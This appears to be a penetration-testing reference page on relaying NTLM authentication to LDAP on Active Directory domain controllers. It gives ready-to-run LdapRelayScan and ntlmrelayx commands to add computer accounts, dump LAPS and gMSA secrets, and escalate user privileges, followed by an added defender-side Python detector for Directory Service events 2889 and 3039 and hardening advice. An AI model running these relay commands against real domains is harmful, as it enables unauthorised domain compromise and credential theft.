
LDAP Relaying

LDAP Relaying attacks can make use of NTLM authentication. Similar to SMB Relaying, an attacker who captures credentials via MITM6 or Responder can then relay them to a domain controller, targeting LDAP.

It should be noted that the following two defaults need to be set in order for this to be exploited:

Enumeration

LDAPRelayScan

LDAPRelayScan can be used to identify whether LDAP signing and LDAP channel binding are enforced on a domain controller.

# Generic usage of LdapRelayScan.py  
LdapRelayScan.py -u $user -p $password -dc-ip $dcipaddress -method BOTH

Exploitation

{% tabs %}
{% tab title="Computer Creation" %}
Create a new domain computer by abusing the default attribute ms-DS-MachineAccountQuota, which is set to 10 by default, allowing all authenticated users to add up to 10 computers to the domain.

This account can then be utilized to perform authenticated attacks against the domain such as Kerberoasting.

# Relay to LDAP
ntlmrelayx.py -t ldap://$dcip --add-computer $computername

# Relay to LDAPS
ntlmrelayx.py -t ldaps://$dcip --add-computer $computername

{% endtab %}

{% tab title="Dump" %}
Relay authentication to LDAP and obtain a significant amount of information about the domain, such as ADCS configuration, LAPS, groups, users, etc.

ntlmrelayx -t "ldap://$dcip" --dump-adcs --dump-laps --dump-gmsa

{% endtab %}

{% tab title="Escalate" %}
Relay captured credentials to LDAPS and escalate the privileges of a specified domain user.

# Relay authentication over LDAPS and attempt to escalate privileges
ntlmrelayx.py -t ldaps://$dcip --escalate-user $username

{% endtab %}
{% endtabs %}
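The relays above only succeed when the DC accepts unsigned LDAP binds or does not enforce channel binding, and every relayed bind reaches the DC from the relay host rather than from the victim. The following added example (not from this page or any of the tools it describes) shows a defender-side check over Directory Service events 2889 (unsigned/cleartext bind) and 3039 (failed channel-binding token) that flags a single source IP binding as several different identities; the event messages are constructed samples approximating the real event text, and the field labels used by the parser are assumed to match the real events.

```python
import re
from collections import defaultdict

# Constructed sample Directory Service event messages (not real logs), approximating
# Event ID 2889 (unsigned/cleartext LDAP bind) and 3039 (LDAPS bind that failed the
# channel-binding token check). Both are logged per client once the DC diagnostics
# value "16 LDAP Interface Events" is set to 2.
SAMPLE_EVENTS = [
    (2889, "The following client performed a SASL (Negotiate/Kerberos/NTLM/Digest) LDAP bind\n"
           "without requesting signing (integrity verification), or performed a simple bind\n"
           "over a clear text (non-SSL/TLS-encrypted) LDAP connection.\n\n"
           "Client IP address:\n10.10.20.5:49712\n"
           "Identity the client attempted to authenticate as:\nCORP\\WS01$\n"
           "Binding Type:\n0"),
    (2889, "[...]\n\nClient IP address:\n10.10.20.5:49801\n"
           "Identity the client attempted to authenticate as:\nCORP\\jdoe\n"
           "Binding Type:\n0"),
    (3039, "The following client performed an LDAP bind over SSL/TLS and failed the\n"
           "channel binding token validation.\n\n"
           "Client IP address:\n10.10.20.5:49950\n"
           "Identity the client attempted to authenticate as:\nCORP\\svc_backup"),
    (2889, "[...]\n\nClient IP address:\n10.10.30.7:51002\n"
           "Identity the client attempted to authenticate as:\nCORP\\svc_backup\n"
           "Binding Type:\n0"),
]

# Field labels assumed to match the real 2889/3039 message bodies.
FIELDS = re.compile(
    r"Client IP address:\s*\n(?P<ip>[0-9.]+):\d+\s*\n"
    r"Identity the client attempted to authenticate as:\s*\n(?P<identity>\S+)"
)

def parse_event(event_id, message):
    """Extract (event_id, client_ip, identity); None if the message lacks the fields."""
    m = FIELDS.search(message)
    if not m:
        return None
    return event_id, m.group("ip"), m.group("identity")

def relay_candidates(events, min_identities=2):
    """Flag source IPs that bound unsigned / without a valid CBT as several identities.

    One unsigned bind may just be a legacy client; one host presenting many
    distinct identities is what a relay looks like to the DC. Returns {ip: identities}.
    """
    seen = defaultdict(set)
    for event_id, message in events:
        parsed = parse_event(event_id, message)
        if parsed and parsed[0] in (2889, 3039):
            seen[parsed[1]].add(parsed[2])
    return {ip: sorted(ids) for ip, ids in seen.items() if len(ids) >= min_identities}

if __name__ == "__main__":
    for ip, identities in relay_candidates(SAMPLE_EVENTS).items():
        print(f"possible LDAP relay from {ip}: {', '.join(identities)}")
```

Hardening that removes the condition entirely is to require LDAP signing and enforce channel binding on every DC (the settings LdapRelayScan above tests for); the detection is for the window before that is done.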

References

{% embed url="https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/" %}

{% embed url="https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/adversary-in-the-middle/ldap-relay" %}

{% embed url="https://www.thehacker.recipes/ad/movement/ntlm/relay" %}

{% embed url="https://www.praetorian.com/blog/obtaining-laps-passwords-through-ldap-relaying-attacks/" %}